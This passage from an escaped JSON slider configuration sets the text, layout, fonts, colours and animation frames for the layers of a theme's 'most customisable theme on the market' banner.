To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"v\":\"100px\",\"e\":true},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"fontWeight\":{\"d\":{\"v\":\"300\",\"e\":true},\"n\":{\"v\":\"300\"},\"t\":{\"v\":\"300\"},\"m\":{\"v\":\"300\"}},\"lineHeight\":{\"d\":{\"v\":\"110px\",\"e\":true},\"n\":{\"v\":\"110px\"},\"t\":{\"v\":\"110px\"},\"m\":{\"v\":\"110px\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(0, 0, 0, 1)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(0, 0, 0, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.4.0\"},\"3\":{\"text\":\"THE MOST\",\"alias\":\"The most\",\"uid\":3,\"size\":{\"width\":{\"d\":{\"e\":true}},\"height\":{\"d\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-229px\",\"e\":true},\"n\":{\"v\":\"-229px\"},\"t\":{\"v\":\"-229px\"},\"m\":{\"v\":\"-229px\"}},\"y\":{\"d\":{\"v\":\"-27px\",\"e\":true},\"n\":{\"v\":\"-27px\"},\"t\":{\"v\":\"-27px\"},\"m\":{\"v\":\"-27px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":14,\"position\":\"relative\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":14,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontSize\":{\"d\":{\"v\":\"60px\",\"e\":true},\"n\":{\"v\":\"60px\"},\"t\":{\"v\":\"60px\"},\"m\":{\"v\":\"60px\"}},\"fontWeight\":{\"d\":{\"v\":\"300\",\"e\":true},\"n\":{\"v\":\"300\"},\"t\":{\"v\":\"300\"},\"m\":{\"v\":\"300\"}},\"lineHeight\":{\"d\":{\"v\":\"66px\",\"e\":true},\"n\":{\"v\":\"66px\"},\"t\":{\"v\":\"66px\"},\"m\":{\"v\":\"66px\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(0, 0, 0, 1)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(0, 0, 0, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.4.0\"},\"4\":{\"text\":\"CUSTOMISABLE\",\"alias\":\"Customisable\",\"uid\":4,\"size\":{\"width\":{\"d\":{\"e\":true}},\"height\":{\"d\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"154px\",\"e\":true},\"n\":{\"v\":\"154px\"},\"t\":{\"v\":\"154px\"},\"m\":{\"v\":\"154px\"}},\"y\":{\"d\":{\"v\":\"-29px\",\"e\":true},\"n\":{\"v\":\"-29px\"},\"t\":{\"v\":\"-29px\"},\"m\":{\"v\":\"-29px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":15,\"position\":\"relative\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":15,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontSize\":{\"d\":{\"v\":\"60px\",\"e\":true},\"n\":{\"v\":\"60px\"},\"t\":{\"v\":\"60px\"},\"m\":{\"v\":\"60px\"}},\"fontWeight\":{\"d\":{\"v\":\"900\",\"e\":true},\"n\":{\"v\":\"900\"},\"t\":{\"v\":\"900\"},\"m\":{\"v\":\"900\"}},\"lineHeight\":{\"d\":{\"v\":\"66px\",\"e\":true},\"n\":{\"v\":\"66px\"},\"t\":{\"v\":\"66px\"},\"m\":{\"v\":\"66px\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(0, 0, 0, 1)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(0, 0, 0, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.4.0\"},\"5\":{\"text\":\"built for\",\"alias\":\"Built for\",\"uid\":5,\"size\":{\"width\":{\"d\":{\"e\":true}},\"height\":{\"d\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"150px\",\"e\":true},\"n\":{\"v\":\"150px\"},\"t\":{\"v\":\"150px\"},\"m\":{\"v\":\"150px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":16,\"position\":\"relative\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":16,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontStyle\":true,\"fontSize\":{\"d\":{\"v\":\"30px\",\"e\":true},\"n\":{\"v\":\"30px\"},\"t\":{\"v\":\"30px\"},\"m\":{\"v\":\"30px\"}},\"fontWeight\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"38px\",\"e\":true},\"n\":{\"v\":\"38px\"},\"t\":{\"v\":\"38px\"},\"m\":{\"v\":\"38px\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(0, 0, 0, 1)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(0, 0, 0, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"customCSS\":\"background-image:-webkit-linear-gradient(left, rgb(63, 214, 184), rgb(49, 188, 238), rgb(114, 107, 239));\\n-webkit-background-clip:text;\\n-webkit-text-fill-color:transparent;\\nletter-spacing:1.2px;\\n\",\"type\":\"text\",\"version\":\"6.4.0\"},\"6\":{\"text\":\"theme on the market\",\"alias\":\"Theme on...\",\"uid\":6,\"size\":{\"width\":{\"d\":{\"e\":true}},\"height\":{\"d\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-2px\",\"e\":true},\"n\":{\"v\":\"-2px\"},\"t\":{\"v\":\"-2px\"},\"m\":{\"v\":\"-2px\"}},\"y\":{\"d\":{\"v\":\"51px\",\"e\":true},\"n\":{\"v\":\"51px\"},\"t\":{\"v\":\"51px\"},\"m\":{\"v\":\"51px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":17,\"position\":\"relative\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":17,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontSize\":{\"d\":{\"v\":\"60px\",\"e\":true},\"n\":{\"v\":\"60px\"},\"t\":{\"v\":\"60px\"},\"m\":{\"v\":\"60px\"}},\"fontWeight\":{\"d\":{\"v\":\"300\",\"e\":true},\"n\":{\"v\":\"300\"},\"t\":{\"v\":\"300\"},\"m\":{\"v\":\"300\"}},\"lineHeight\":{\"d\":{\"v\":\"66px\",\"e\":true},\"n\":{\"v\":\"66px\"},\"t\":{\"v\":\"66px\"},\"m\":{\"v\":\"66px\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(0, 0, 0, 1)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(0, 0, 0, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.4.0\"},\"7\":{\"text\":\"Image 